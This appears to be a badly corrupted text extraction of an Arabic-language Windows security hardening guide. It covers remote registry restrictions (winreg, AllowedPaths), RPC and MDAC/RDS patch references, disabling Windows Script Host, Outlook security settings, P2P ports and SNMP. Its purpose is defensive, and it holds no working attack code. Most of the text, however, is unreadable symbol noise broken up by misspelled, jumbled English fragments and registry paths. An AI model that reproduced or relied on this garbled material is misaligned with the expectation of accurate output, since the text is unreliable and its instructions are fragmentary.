bP
0,
DY/ - .
6" E )
$Service Pack 3
E
$l ', ,
" ()&17
SL "
u
:
E
u
] ,E
" ?# $7 ) X 7
"
)
7
$
" ?
-,<restore
:
)
E
-,<Backup
("c R1$
0, <
<
2
"), )
I5
/ )NT 4.0
E
0, < 2t5: $
6T5! " %PH
!89 +
3
u( E " %P
H 3
!89 $ 1 2
?@ " $
a 5 - Y
2#5 Trust
pqqq "), )
E
K
I 5 Restrict Anonymouse 1 " ?
, $ K " T#<
E i
NT 4.0 "), )
E ? 5 Resroe ) $j
) $ Backup - .
pqqq "), )
E•? 5 Restore ) j
) $ Backup - .
"
'
F) ? @ _
) XP "), )
E ? 5 Restore ) j
) $ Backup - .
pqqs "), )
n 9"
a K5
E
TP
), . T 5!
E ,B
E
I5
I 5 a #P<
" %/
), .
$ #P<
create the following Registry key
HKEY_LOCAL_MACHINE\SYSTEM\Current controlset\control
Secure PipeServers\winreg
Description:REG_SZ
Value:Registry server
- "
" F)
K 6)
j 4 7 5 I $"), ) SL ? "
0, 5
$l ', B e 'Access Control List
]
,
6)
" %/
$
a K5
)?
d*
3
$l ', B
,<
B
E
),. T5!
E
6" E ) 7 "
, Backup Operators
)
6" E
) Regedit32.exe ]
I5 , B
E
E
F
a, B 2 '
F E F
HKEY_LOCAL_MACHINE\SYSTEM\Current
ControlSet\Control
Edit
n 9 " Add Key
a "
Enter the following values:
Key Name: Secure PipeServers
Class: REG_SZ
a, B 2 '
F E F
-
H _ pqqq "), )
TP
_ regedit.exe
)
& O*
z
0,6
HKEY_LOCAL_MACHINE\SYSTEM\Current
controlSet\Control\Secure PipeServers
Edit
n 9 " Add Key
& O*
a "
z
Enter the following values:
Key Name: winreg
Class: REG_SZ
a,B 2 '
F E F
HKEY_LPCAL_MACHINE\SYSTEM\Current
ControlSet\Control\SecureServers\winreg
Edit
n 9 " Add Key
& O*
a "
z
Enter the following valuses:
Value Name: Description
Data Type: REG_SZ
String: registry server
a, B 2 '
F E F
HKEY_LOCAL_MACHINE\SYSTEM\Current
ControlSet
\Control\SecurePipeServers\winreg
0 Permissions
" E Z :!
) Security )
B $ winreg O *
I5 " E
)?
6-)
?
1/ 2
0 5 'X
( E 7 5 I ?, < T G' I 5 ) z 3 Registry Editor
0, K5
", -
E
"
$-,<
F)
0 5
E
#
1 u ,LH
-,< - < B
/ 2 3@ ?
^P
I
"E ?
)
i
$,<
<
), . T 5! a-,< , K ) - "
6U )
:
"
("c
6" E "
3 i: ?
, B
? @? 5 d*
AllowedPaths
^
]
5 =
Machine
G
2
$
0,<
E
< TP, $
account name U )
1 Z F T/ winreg T5! (,!
,B
),. T5!
P F7 [ ,
Directory Replicator ) service printer Spooler :
? )&'
#
^
I 5 "), ) , # 4
3
6, B
)$
), .
) Users a_
Bypass the access restriction:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Control\
SecurePipeServers\winreg\Allowedpaths
Value:
Machine
Value
Type:
REG_MULTI_SZ
-
Multi
string
Default
Data:
system\CurrentControlSet\Control\productOptionsSystem\
CurrentControlSet\Control\print\print\printersSystem\CurrentCont
rolSet\
Services\Event logSo ftware\Microsoft\windows NT\Current V
ersionSystem\
Current Contro lSet\Services\Replicator
Valid Range: (A valid path to a location in the registry)
Description: Allow machines access to listed locations in the
Registry provided that no explicit access restrictions exist for that
location.
Value:
Users
Value
type:
REG_MULTI_SZ
Default
-
Multi
string
Data:
Vaild Range:
(A
valid
(none)
path
to
a
location
in
the
registry)
Description:
Allow
users
access
to
listed
locations
in
The registry provided that no explicit access restrictions exist for that
location.
DY/ - .RPC
bP %K %
SL
:
2
A) 2
Windows Update ? 5 TG' g
#B
5!
^ P
Patch b
I
,G
), . T 5!
6MBSA
-, < K
6A)
:
)RPC h @ " - Y
http://www.ntbugtrag.com/dcomrpc.asp ("c 0, < , Y ,
- .
:
),. T5!
#B
5!RPC 2
U4 ) (E
#
?# Patch
B
5!
$
"), ) U )
g
0 5 T 5!
bP
) ? 5 TG' g
"
3 I
B
67
7
)
4
? '
<,
0
F)
2
# 2
" ;! ,
u,
? @ $ #B
5! .
$, <
,<
:
- <
3
2
F)
)
$
4
" ? 59 "
? 5 RPC
^
^
Š{s ) ‹‹Š ) ws{ ) wsŠ
‹‹Š ) wsŠ$ws}$ws†UDP0 5 V8
) "), )
$ R4 S @ :
a 5 - Y
67
"
:
!89 +
E
4 ] "), )TCP
67
4)
_
),. T5! - .
K<@
I
-, < - <Windows remote Access Servivces
" ?
Security Bulletin Service & Hotfix Microsofts
editor windows server 2003 Registry) XP "), ) " - Y - .
access: Remotely accessible registry paths and subpaths
Network
Server 2003 Security Guide windows
! " % &# 08
Microsoft Data Acces Components
(MDAC)
MDAC
S @^
!89
" - Y
R4 MDAC
?5F
bP
0
" ,
-,< '
) 6, "
$l '785/ 0, 5 - Y _O * 7
a 5 - <
"2
E
B % !)
"
H
# $"), )
:
?
! E % <$
3
2
6*
"
,G
,G 785/ ?
), Z F]
6 # ) " - Y RDS
I ] 5 ,H
6 „1# "
3 M ,6
1
) ,<
<
F
$
R4 S @
,G % c ,
-,< K 7c L.
, ,F %K
F) ) _
overflow buffer - 9 *5
F
5 $
0 ",
RDS 7 5B "
MDAC $ "
S
Remote Data Services 5 , H *
H
) - " ?
0, 5 Z F $
, 7"
$
=GX
) 6" E - 5
78#
) 6=GX 0_
?@
B
F
* ] s) Š MS Access
!89
6
GX) 2 3@
6
T
3" 6
R4 S @ $_
6 ' ,G 7, ,
" j ) -,< 3 < %
5 ,H
R4 S @ B % c " $ 6
0,<
Microsoft jet
" ) j &'
]
I 5 ("c 7 ,
)-
B
. 7 L
=GX - 5 l '=GX Microsoft jet Database
Database Engine "
-, < h PH
6
F) 0
S
: $l '
-,< K )
, # 4 (,!
)- # (N
F
) 6, "
0, -,
!
785/ l '=GX " - Y
3 785/ "
# Buffer Oveflow
?
?5F
(E
%1
, $ :
- 5<
MDAC0,<
P
3]21 MSO3-033 *
_
5
R4 S @ : 2
0
MDAC
-, < - < ?@
$pqqs "), )
' ) #
$() *
"), )
IIS
Q NT
6
)
T)J) $ RDS
) j<
l'
6*
=GX
SQL " MDAC
0, <
6*
] SP2$_
Q$ <
l ' R4 S @ :
+
‹) q
$,< -,< SL w)Š
) pqqq O), ) 0,< XP - 5 ] pqqqU '@? @ )
* SQL Server 7 ? @ )
?@ )
, 56SPI $_
K6
-, < SL , G ) Server 2000
-,6
N 560, 5
- Y
"), )
! ". /0(123&
"), )
)
% ' F) W L3
NT 4.0 - 5 IIS SL
#
)
*
$,< -,< masdcs. Dll” % '] < ( E
("c
C 5! l 'files\Common files\System\msadc\msacds.dll c:\program
h @
#
0_, < 7) Y
) "
,
#4
F
2#5 l 'h @ $
patching 2
( N $,< l '% '% < I
% ! 6
) 5 ,H
7 K
&F "
6 @
6 &'(
I5 0 < , 6 3
F) 7
0
H$
: $
(E ?
HS @),, e G
$-,< - <
("c
3
" ?
(
:
W
(N
W L3 MDAC- 5<
R4 S @ ^
2
0 5 - Y
L3
("c
( ,H
F b < S
)(E
R4 S @d *
2<
)
0
-,< i
3
-, < SL
6 &'
456 123&
:
RDS $Jet " ?
? @
h @http://www.wiretrip.net/rfp/txt/rfp9907.txt &
DY/)
I5 &
"
! " %&
6=GX
' ) # Windows update
$l '? # 0 5 - Y $
0 5 ,6 3 6 &'(
MS03-033
21 " ?
- .?@
R4 S @ : 2 %
_
B ) i.L - . )
' ) #
P
3]2 1 2,
0 5 - Y
:
2
http://support .microsoft. come/support/kb/articles/q184/3/72.asp
http://www.microsoft.com/technet/security/bulletin/ms99-004.asp
http://www.microsoft.com/technet/security/bulletin/ms99-025.asp
http://www.microsoft.com/security_bulletins/ms03-033.asp
http://www.microsoft.com/technet/treeview/default.asp?url=/technet
/security/bulletin/MS03-033.asp
http://support.microsoft.com/default,aspx?scid= kb;en-us;82378
?
ver
*
$l '
2 3@ 0
=GX
3
$†$p MDAC
Z
I MDAC *
!89
6
F MDAC
bP
!
)
h @ n 9" ?
http://msdn.microsoft.com/library/default.asp?url=download/list/dat
aaccess.asp
" ?
0 5
:
2
0 5
'
) -,6 windows update - Y &
! " % &# 5,
Scripting Host(WSH Windows)
WSH
)
4 #
)
#B
5! j &' I 5
6*
„ 1 # 0_
-
- 5
6, " - Y
N
4 -,
,
6
#
U
l ' 6%
$"), )
4] , 5
-,<desktop
0_
5/
) K f4 *
F $% '
I ],
„1# $
K "), ) % !VSH ?# $
?@ " g@],
F
-,< K
? G
)
K "), ) 7 B
5! ?
n 9" C
5
,
- 56{† "), )
b
"), )VBScript P 21
) )
) F " $l ' „ 1 # 0,< ?
- 5 IE
') #
Z F
4
6' 4 #
)
-
? 5 ,B )
n 9"
)
4 #
% '
0_ # ) #1
ZF
-,< < VBScrip 0,
b
"
3O * M 6
7
%
3
% '\
vbs,. Vbe,js, .jse0) 0wsf
6 '$
B ;!
I 5 $, ,
& WSH O G
0
) X ! B % !$ ILOVEYOU , ]
J)WSH(
)
)
-
‰ : " U4
6
K6(
F ?# $S
T)J)
#
<R ? 1
_
) l '(
2 , 0, - 5 - Y
? G $jscript
6" E
i:
$() *
WSH K
)
#
- 56
)
#B
5! j &' I
) F " $l ' „ 1 # 0, <
P IE *
„ 1 # 0_
WSH
-
4 -,
)
Z F
U)
n 9"
-,< K
? !
?@ " g@ ] ,
E $% '
b
„1# $
6VBScript 2 1
) )
"), )
,
- 56{† "), )
N
I ],
0_ # ) #1
- 56
') #
5/
) K f4 *
K "), ) % !
$"), )
)
#
6
4
?# $
-
6, " - Y
ZF
J)WSh (
) X ! B % ! $ILOVEYOU ]
-,< < , VBScript 7
b
M ,6
%
I
0, ,
3 c
‰ : ?@ " U 4
3 O * WSH % '\
& "
wsf.vbs,.vbe,js,jse
OG
0
6 '$
)
$() *
"), )NT "), )
2 3@
6
<R ? 1
K6(
F ? # $S
)
i:
-
TJ)
) l '(
_
0,
2 , 0, - 5 - Y
#
? !
Jscript
6" E
+,
WSH n 9 "
*
B ;!
)
7
$IE )
,
$_, G
f4 *
]
SL {Š ) ME,98,98SE,2000,XP ) WSH,2003
0
'
0
Windows Scrpt
SL e 'j 4 7
h @ " ? Windows Download Script0 5 - Y
+
! ". /0(123&
-,< SL IE5.5 *
- 56 NT
) {Š "), ) ? @ )
K6
•
0
-,< SL pqqs ) XP $ME ${† "), ) ? @ )
0
WSH
#
W L3
0
$, <P -, < T
("c
("c :
K6
WSH A) " - Y
DY/
I
:
2
?@
K6
' ) SL
0 < ,6 3
)(E
#6
•
)
HS @e G
-,< SL ? @ )
" $,< ,6 3 - < ? @
,G j*
K6
- Y $?@ %
! " %&
$
456 123&
, 7 B
5! ) 6
" - Y , " WSH
0,< , 6 3 F
T#<
3
$l '%
l' 6
? 2 & * BWSH
- <
# 2
4 MR/ ) ? 5 TG' g 7
("c ,
)-
„ 1 # WSH ? 59
T G' g
?
) MR / $ 6
bP
%K
)-
) "
,G
) 785/ %
WSH 5 "
)
?@
"), ) % !
?@
DY/
#B
5!
"
I
#
3
3
* $
N ?), )
$
]
40 5
TG' g l '%
4$
0_,<
Noscript.exe b
8
$ WSH
6h8 % '( Wscript.exe
) Cscript.exe
6, BShell\Open2\ Command
E
6
6 ^
-,< K $ Sysmantec U )
#
5
SL
F W L3
I
("c
) Shell/Open/Command $
N 4 $S
0, < , 6 3 ( E $? @
Noscript.exea K5
TP
Y
2 , 0, 5
)
P
Q M , 6 " I'
" Noscript.exe
$ Norton Script Disabler/Enabler
) TG'] WSH
GX) 2 3@
Z F " U 4•
F
#B
5! W
6A"
L3
("c
4Desktop
K6% ']
#
wsf0.vbs,vbe,js,jse, $
OG
6% '] -
?# ?
6
-, < ( E
#
$-, < <
N 4)
-
j 5
6 '?@ ? 5 TG' g
,
DY/
$ 5 %K
I
6% ' "), ) e 'j 4
,
#4)75I
j 5
6
2
6% '
u
.
3
, )
" ? 59 " U 4 ,
'?
- .0
EXE
u_
) COM ) _
0, < , 6 3 Z F ? @ B '8
("c ? 59
0 5 6 '$" E
F%
#
F
"), ) e 'j 4
FWSH ?,< TG'(,! W L3
#
WSH ( E
) 7 , , ? 5 m .1
6% ' ^ P
"), ) K F
) / % '?, < T G'" U 4
,6 3 -
_ <
_(WSH
^
OG
•
'
] Noscript
0
)
T G' g
" %/
Symantec
) T G'? # $_TG' g
u
I
?
g
MR/
6
#
% '$
#
$S
2, 0,<
K6
#
0
-, < T
"E
?
0 5 d*
0, 5 •*
T /2 !
) ), . $,
# WSH ?
6
6
! $2
?@
F W L3
("c 5L
S @), ,
G
I 2, 0 < , 6 3
@? !
Z F ?# ? `56$
) / % '( csript.exe
#
0 wscript.exe
)= G
Cscript.exe myscript.vbs
? 5 TG' g
) MR/ - .
:
7 !89 S
WSH
I
h @" ?
http//www.symantec.com/avcenter/venc/data/win.script.hosting.html
0 5 - Y
,`
:&"
-, < ( N U ) )
? 5 TG' g
^P
I
3
$l ' 6 &'(
O *
6% ' I ] 0
6
#
( E
WSH0, 5
b
-, < K
6(
$S
6%
) / K5 X
, <
.scr.vbs,js,jse, wsf,bat,
Script Blocking
4gatways U )
SL $? & ) ? , 6 WSH ?
-)8! ]
("c
@
$
2, _
4" - Y
# ) #1 6
) 6h )
)exe pif
and
8Q _Norton AntiVirus 2001 ? # $, G
C
P
6h) ) %
? & ,
K
DY/
a; [
,Z 2(2 +
WSH " ?
QS $
?@ *
2 3@ 0
h @Windows Script Download0 5
'Z
7 G', $ 3 ? 1
'
+ , 2R NTFS
6" E " NTFS h
wscript.exe ) jscript.exe
% H
?
i: = G
"
K6-)
)?
I
?
^P
9
- 56account
V <
% ' )
#
% ' )
" 0 5 - Y $"), ) PG
e 'j 4 7 5 I $ <
6% ') 6
Full Control -)
$‰8
W L3
l 'e
) Everyone
$, <
?
?
5 $S
2, 0 <
("c " E
'j 4 7 5 I 0, <
$ 6
0, ,
+
:
uNTFS
6" E
TP
5 % <
'
I
25 0, <
5 S
K6-)
)?
) X
" %/
$
) 6% 'MR / ) T
wscript.exe ) cscript.exe MR/ % < 6 ,1') 6% ' "
I
<R V <
<R NTFS
e 'j 4 7 5 I $ <
7
6
% ' )
^P
a K5
25 , LH
B' )
O * $My Computer ? 5 TG'•
$
0,<
_% '$
$
u , LH
] -,< O *
0 K5
d*
9
-)
$?, 3] " E
L3 Y.
O*
tab 7
(,! Deny )
?# Allow
% '
Property $
?&
% ,P
% '
I
)
$
NTFS
convert drive_letter:/fs:ntfs
6" E NTFSah @ " ?
bP
\ $Pemission j*
0, 5
#
Security j *
F) ?@
)
^P
.Y
F) ?@ "
Property Y. ? 5 TG'•
< ^
Account $d
I
<
5 -,6
" ?
I - . W L3
% ' )
d*
6" E
•
& 0 K5
_000 ) 2 <
Security
$% ' ^
NTFS 0
•
-,
, #4
$ Convert ] 0 5 - Y
7 !89 S
I5
$
http//www.microsoft.com/windows2000/en/server/iis/htm/core/iidfp
sc.htm
0 5 - Y
! " % &# 0,
Outlook Express, Outlook Microsoft
Outlook 7 !89
$l '
0
') #
$ 6h 5
b
$_U '@
-,< K
, ?# $ # ) #1
^P 7
0, 5
Exchange ) K
4"
K $
K6
0, <
"2
-, < K
0_
-
? &56
‰:
Outlook98 y
SL 7
P
# ) #1
0
I
5
6
BH
)
-
$ F
!" V
8Q 0, < , 6 3
C
A
0 ' ,6 3
3W 3
6%
4
H I W L3
) ?N
IE
^
- Y
F
6*
%/ -
"
6
J) 0
-
,E - Y
9
) U '@$
, ) T) ,
)
1
) < ,6 3 TP
N P ?@
6
- Y
*
?), ]
$:
, "
T#< ")
=GX
[
7
F) 7
G ) - ), .
?@ " - Y Z
")
B
5! b.
, N : <2
C
G:H
6j1 $2t5: ) 25
S
*
" - Y 0, < , 6 3 6 '&
F =GX $W 3 L !
I
$
6 &'(
SL ?# _ c
$l ' # )
3
$
) rendenring 0, 5
6 )
H ? 5F
*
?@ - 56
, 1
6 '$( '784 2
, G 7c L.
!
]
56${Š "), ) 'G ? " " ]
' ) #
Outlook 98
IE - Y a? `56 P
Q
4 -, 6 U )
=! > ?@
SL
? !
4 " HTML
2
-)8!
Server
V < ? " $7 H8
IE
-
Yc j*
5 ? !
) L*<
1
) 7 ,3 K
Backoffice „ 1 # " - Y ? # $"), ) % !
$
U)
*]
6
c L. n YBIE ) OE
I
4 -,
5/ 0
)
Express Outlook ] _OE
Outlook K
! 5E "
? " ) 6 1G'Oulook
"
4 l),
F
# ) #1
bP
b
2,
5 $
6 &'(
4
6 '&
$_ ' ) #
("c 78
%
,
- 4$ ') #
BH
M ,6 "
# 0 < ,6 3 T
# ) #1 6
) 7 !89
,
,
\X
2 )-
$ # ) #1 6
0,<
< TP
O *
&'(
P
6h) )
6@
& ? 5 About
I
n 9 " Help
l'
f4 "
Outlook ? !
Z
0
,
:3 ) 7 , , ")
# ) #1 6
-,
"
*
2K4
0 ' 6 @
6*
6N F e 'j 4 SL ] 0
,G
- 5< " ?
?) ' 6 BH
3"
$IE )
F " U4 $IE TG' $
>! ? !
) ,< ,6 * SL
Outlooka
U)
l ' &'(
6
K U '@-
$?@ SL W L 3
_
-,< K
"), )OE
0
B '8
0, < -
6T
/ "
5 - 56 -,< K
"
, ,F *
-,< E
+,
6*
*
G
6, ) 6(
$() *
OE
e
)
!89
6)
$
,
$
,F
)
7
5L
6*
Outlook9 •
Outlook97 •
_ <
Y & Outlook2002
_ <
& ? 5 TG' About
*
pqqq "
a 5 - Y
"
] Outlook 2000 •
) Outlook10 ?@
] OutlookXP •
n 9 " Help
- 5< " ? OE 2K4
!
Y & Outlook9 ?@
6*
Patch +
0 ' 6@$
" ?
!89
-http//www.microsoft.com/windows/oe/.
-http//www.microsoft.com/office/ outlook./
+
! ". /0(123&
F " U4 ] IE
:
)
2
_
-,< SL
0,
(N )
) SL "), ) % !
6
?@ - 56
Outlook Express
" * IE
$U '@ 6
SL
*
"
,6 3
,<
! 5E SL
" - Y
( ,H ? Outlook -, < K
( N (,! 7
0, <
H, , e G
?@ )
K6
0
-,< SL &
0 < ,6 3
HS @e G
0 5 OE )Outlook
6*
3W 3
$ 9
5
%K
75 I
& A
! (,!
#
) -,< SL
0 <
! " %&
456 123&
"2
a
(E
F 7 , , j6 ) l ' R4 S @ %
YB* 7 B
5!
# Outlook
+
6
"
Outlokk Express
e 'j 4 7 5 I ) SL Outlook ) Outlook Express
7 5 I W L3
4
DY/ I 5
("c
W L3 2
0,
:
2
0
=GX
2t
5: -,< SL
*
?
(N " ) (E
a
SL ) http//windowsupdate.microsoft.com/
. ] Critecal C L 3 -,< K
_
n 9 " Layout
0
6
,
& O*
0_Preview]
6 'Show Preview Pene
bP
" 5
Security Zone]
) O * Options
& ? 5 TG' g
n 9"
a,<
:
I
" View
5#.
2
•
0 # ) #1
High I
<b 2 "
$7 !89 "
6
5
1
) % 4 ? 5 T G' g •
0 < '
?
6Patch
/ 7 5I ? 5
& Tools
- Y •
) A" @
) X?
25 , @ ' ^ P
,
# ) #1 6
"
•0
% !
" - Y
K ?@
j
:
("c
?
F
$, < 2t5: ?@ -,
T
+P
6h) ) W L3
/ $ 5 5X % '
("c
'
•
? "
$?@ ? 5 TG'" %P
H) ,
0 <( E
"
g ] , 1'
? !
? ,
6h) ) "
6% '
"
("c $ 5 5 X % '
" ,G b
'
5 5X
'
$l 'h @ ] 0 5 - 3•_MY Documents
6% 'S
#Y ]
5 O*
N
_
("c 0 <
3
# ) #1
XSL
% <,
0,6
' ) #
" - Y
macro Disable
I
6% ' /
'
F
# 2
,<
% '
*
6,
•
("c #
High ,
&
)
- <
HS @),, e G
7c L.
:
6% '? 5 T G'" •
- 56 5 5 X
) DOC
•
? "
$_Word
I]
TG'
0 < '
`
:&"
6
!89
DY/ W L3
6
0, 5
DY/ " ? 59
"
K $O *
(N
(N 7 B
5! $h) )
@ ' 4
h) )
@ ' 4 ) , ,F
6% '? 5 V8 " ? 59
4 0, <
)
6
-,6
# ) #1 6
? ,
?"
h)
h @" ?
6
U)
$O * Π#
)
@
6
NY67
6
)
(E
5 j 4)
@
) 6h) ) "
) 5 5X
@
7 L
6
" - Y " %P
H h) )
,
Q%
Q $7 , , 2 , ,F %
0, 6
)-
6 &'(
L %H , / 6h) )
, , " %P
H $Π#
n 9 " 6(
@
) 6h) ) $ 6(
6
I5 -
? @b
7 # $h) )
6,
I 5 0,
BH
$
P
DY/ 6 & $
" ,G 0,
6% '7 L
+F
)O * , % <
(N
# ) #1Preview $
I 5 0,
$ '
http://www.microsoft.com/security/protect/antivirus.asp0 5 - Y
A
) #
QS $Outlook
+
Express OutlookG
Outlook Express j &'M,6 ]
$l '
*
"
2 3@ '
I 5 0_ c
g] , 1'
?@ ,
? G 6h) ) "
"
/ )
N
6% '
'
7 G',
'
3
2
_
O*
6% 'S
#Y]
F
\) < :
5 O*
N
) DOC
0,6
' ) #
macro Disable
)
6% ' /
0
- <
" - Y
'
,<
% '
*
6,
•
("c #
High ,
&
F
# 2
HS @),, e G
7c L.
<
- 56 5 5 X % '? 5 T G'" •
# ) #1
XSL
% <,
•
? "
0_
("c 0 <
9
l 'h @] 0 5 - 3•My Documents
,G b
5 5X
3 ?1
5 ) 6 BH
("c 5 X % '
, 1'?
"
'Z
_Word
I]
T G'
0 < '
`
6
DY/ W L3
!89
6
, 5
(N
(N 7 B
5! h) )
@ ' 4
h) )
@ ' 4 ) , ,F
6% '? 5 V8 " ? 59
4 0, <
$
)
-,6
6,
I 5 0,
BH
6
# h) )
K $O *
DY/ " ? 59
"
P
? @b
U)
? "
$O *
@
6
6
# ) #1 6
? ,
h) )
I
#
+F
,
:&"
6 &'(
) 6h) ) $ 6(
NY67
6
6
)
(E
6
) 6h) ) "
I
7 L
5 j 4)
, , " %PH $
) 55X
@
Q 7 , , 2 , ,F %
0, 6
)-
Q%
L %H , / 6h) )
" - Y " %P
H h) )
n 9 " 6(
@
I
#
@
)O * , % <
DY/ 6 & 0
" ,G 0,
6% '7
0,
A
L
(N
# ) #1
$Preview
.
http://www.microsoft.com/security h @ " ?
$ ' ) #
0 5 - Y /protect/antivirvirus.asp
Outlook Express
M, 6 ]
'Z
" ?
7 G',
$l '
" ? 59
*
'
I 5 0_ c
U '@ 6
)d *
7 L l'
.
7 K
&F "
6 @
I
XP Security h @ " ?
#
7
u
) Outlook ?
4
(N
5
("c 0 5 - Y white paper Office
# 2
$,<
#P<
? , 0 < -,
" Outlook
) X ) ("c "
bP 7 5 I )
6T5! " %P
H
I5 ,
( N6
0 5 - Y Offece Product
0, 5
$XP U '@ *
- <
)
5 ) 6 BH j &'
http://www.microsoft.com/windows/oe h @
I5 0 5 - Y
Updates page h @ " ?
^
QS $
9 Outlook Express
3 ?1
2 3@
Outlook +
"
* 5<
, \89
# ) #1 6
"
( N6
^
\X
$
7 K
&F
<@
0, 5 - Y Resource Kit Office
Outlook Express
U)
6
)
# ) #1 6
? 5 Uninstall
I
N W 3
( ,H ?
$
?
"), )
6*
)
0 5
?
ME
Setup
- Y 7 !89
, -,
•
Outlook SL 7
? 5 Add/Remove Program
•
Outlook ExpressSL 7
) {† "), ) )
O * ) Windows
" #
) " Outlook Express ) Outlook
a 5
& " - Y
Outlook ? 2 &Uninstall
& ) Add/Remove
Progtam ? # @ O *
0 5 6 ' ?@ MR/ ?# Outlook Express
?
XP
a 5 - Y
•
Outlook Express SL 7
) pqqq "), ) )
"
6h @ " 9
7 B
5!
, `4
F
Outlook Express Version 5. X/6.0 *
h @" ,
- Y
,
"
pqqq "), ) ?
5
…
- Y
http://support.microsoft.com/default.aspx?scid=kbEN-Usq263837
0, 5
Outlook Express Version 5.x/6.0 *
h @" ,
- Y
$,
"
ME
5
) {† "), ) ?
…
- Y
http://support.microsoft.com/default.aspx?scid=kbEN-Usq256219
0, 5
R4 S @ : 2 5
Wimdows Peer to Peer File Sharing (P2P)
6 ' ?# 2 ) 0, < '
User mode
I
" ,
H- Y
' $ K, )
" ]-
2
l' 6
h
-,
"
- 3• >'
I
4 -,
? G? ,
6-
I
N
6 #P<
" % ' '
? ,
)
SB
g
-,< K 7 < &
?
" ) +"
0, 5
)
6'
)d*
<
3
)V#
$ 6% 'V <
2,
U)
? N - Y
Q
" - Y
H? ,
I5 l ' 6
code Source
Napster b
6
9P T
" \ 2
- Y _
/) 6
, 5
6
2 H
U)
6
+" ) Download
)Y \
5
<2
I
3 ?1
7 L SB
g l'
6 "
I
!
B
B
512
U)
?#
1
&5
) ,<
d
l ' R4 S @ :
6
n 9 " -, < 1P
0, 5
(
7) Y -,< - <
^ P ) -,
0
E
F
6-
E F
U)
I
&'
6% '
,
)-
?
0, R V <
6% 'T
)?@
download 2 ,
7
5
„ 1# 2
LAN
,63
L ?
6
F
1
), 5
)
5 0 5
' $ 6% 'T
F) & WAN
6
H ,F , , ) S @ e G
(E
U)
'/ < \
N 7 4" - Y
K
-
1%
I
l'
\P
< ?# W 3
6
P2P
) (E
6% < ,
67 4 " X /
I5
?@
http wrappers " - Y
" - Y
) E F ^P
0,<
( ,H ? " ?56
- Y e 'j 4
I
), . ("c 78
I ^P , @ '
<] -,
I
0 ' , 6 3 -,
6 #P<
0 < ,6 3
% < I
_-,
Q 0, <
)
6
'
E F 0, 5 upload 2 ,
l ' 6
-, < T 5!
3
? &56 : ,
. 2'
T/
v 4 6
6
? "
i:
multithread
/ ) j &'
" - Y ? "
5
"E
g
DOS \ "
85/ ;! ,
) _P2P -,
U)
7 !89 23 , - 9 *
F) 0 <
<R V <
,F :
<
_… )
F) & ^
6 &'(
$
\X
]
L $
2
,
#4
:
_
% < P2P
$ " ]&
B'\
l '7 , , 0 '
=GX % 1
, ] #P<
),.
H %K
N` 6]
:
2
0
] 7c L. -, 6 K
6
n 9 " -,< K
6
\ 2 " ? ,
.
6
_
,
<b
.
TP
- Y )_
) B'
0, 5 F
$() *
% !
_0
F
6*
5
-, < < "), ) )
F) & U
1) U#
^P
SL
% !
P2P
?
I5
6
+,
,G
^
0, <
3 W 3 j1 #P
< )
5 - Y "), )
6*
:
,, 2 e G
P2P
a
" \ 2 b
-, < - Y T) ,
2
P
1
& ?@) <
! ". 0(123&
6
" - Y d *
4
4 )
"
6* ]
+
,6 3 TP,
6
"
:
#P<
' y
2
<
•
6
6
b
C 5!
application layer strings
'
E F•
- Y P2P
0
-, < download
. T
I
#P< "
- 3• 6? #
_exe, mp3, wma, avi, mpg, mpeg, jpg, gif, zip
0
"@
'D
j6
#P
< "
- 3•Z>'y
! " %&
(E
)Y 7 B
5!
6% ']
$l ' R 4 S @ : %
•
b
•
456 123&
DY/ I 5
a
? "
? H ) dowmloading
6
^P
|
<
" - Y •
T G
? "
? "
g
6
" - Y - .
.
#P<
6- N
^P
" - Y •
T G
) #P< "
•
- 3• >' 5
0" E
;N8
6 &'(
C L3 &'(
SL
H
5
3
•
15G ?
0, < P2P
T
P2P
6
b
I
) 4 -, 6 U )
" - Y •
-,< - Y
67 4 _ ) ) | F) 3] y
P2P
^P
'
0-,< ( N h) )
-P2P + ,
B'•
•
C L3 #P
<y
@
6 &'(
"
& \ 2(18 1 5
") - Y •
+ ,C 2
_••{{ $††}Š $†††† - 5< TCP
67 4] Napsster
•
_‹••Š $‹••p $‹••w - 5< TCP
67 4] edonkey
•
•s‹} $•s‹• $•s‹Š - 5< TCP/ UDP
67 4] Gnutella
•
6- 5 < TCP 7 4]Kazza
•
TCP/ UDP 7
4 ) www
wp‹w - 5<
! " % &# ,
Simple Network Management Protocl
(SNMP)
-N
5
SNMP " - Y
784 2
) ,
, #4) ) - " y
#4
I 5 ?@ "
#
SB
g
$T
0 <
1
)$
I 5 SNMP %# ) 4 "
- Y TCP/IP
- Y
P ' 4
#P
< 7) Y
6
6( '
-
) 6Access point $ 6ˆ K $ 6 ) $ N4
'
0 <
SNMP
,
6( 4
^
6N
3
2 ( 4TP
B %
,
6- N
$SNMP
-, < - Y
b
o
F
&
$
SNMP
N& S
^P
%
< 0_, 5
- Y
] #P<
)
3
$l '7 !89 " - Y
Q 0, <
R4 S @ ^
?
5 SNMP
u
- 5< *
$SNMP
0_, *
L3 7
L
_U )
3
,K
B!
" ,G b
R4 S @ ^
< $h
_?@
/
X !
6-
' )
!89
-,< %L
3 M,6nH ) S
-,< K
6v
6( 4 , K
"
$SNMP
*
I5
j ,4
]
< TP,
P
"
- Y
6N
6N
O*
H
e 'j 4 7 L ? ,
6T, " - Y
- 5< *
#4
PG ) , K
R4 S @ ^
3
, G ) T G' SNMP
,G
" $SNMP ) )
,1 "
I5
7 K
&F
SNMP
6( 4 "
<
0, <
R4 S @
^
, ) ,
) 7 !89 Z ',
2 5F
)
H $l ' R 4 S @ ^
- Y SNMP
3 785/ &
c L. $ N
#4?
bP
R4 S @ ^
6*
5 i: j &' I 5 ? ,
6N
SNMP
6A) " - Y (,! 0, 5
! N " $
#P
<
A) " [
P e 'j 4 A N 0,<
6
0, <
3
gV
"
PG ) , K (& # ) -,< 1P
^ P
SNMP 5 , H
? G -, < &
<
) 6
3
7 & E ) 7c@ 2<
]
V
^
- Y
6A)
6( 4
6A) " [
0_78#
,
6A) 0, 5
-, < - Y
,
6A) " $SNMP
)Y
" ] DOS \ " 7) Y 785/ ( E
? '
0, <
I5
$qs …pqqp CERT – h @
R4 S @ ^ 0 5 -,6
0
6N
! B
5F " $ 6( 4 "
* ] SNMP
- 5 _
- Y $ #P< y
I 5 -,< - Y
:
I K 6N
H
, 5
6T, " - Y
6A) W L3
,1
K
]0, <
("c ,
U)
? G SB
g )0
2#5
#P<
, 7c .
A)
SNMP0, <
Point
6- N
U
1) U#
-, < d *
0
3
$UPS
6N
^
)
$ 6 N4
,
7) Y
/f
=GX % 1
,
:
9P
Bridges ) access
% !
P 785/ &1@ " %
#4
B5#
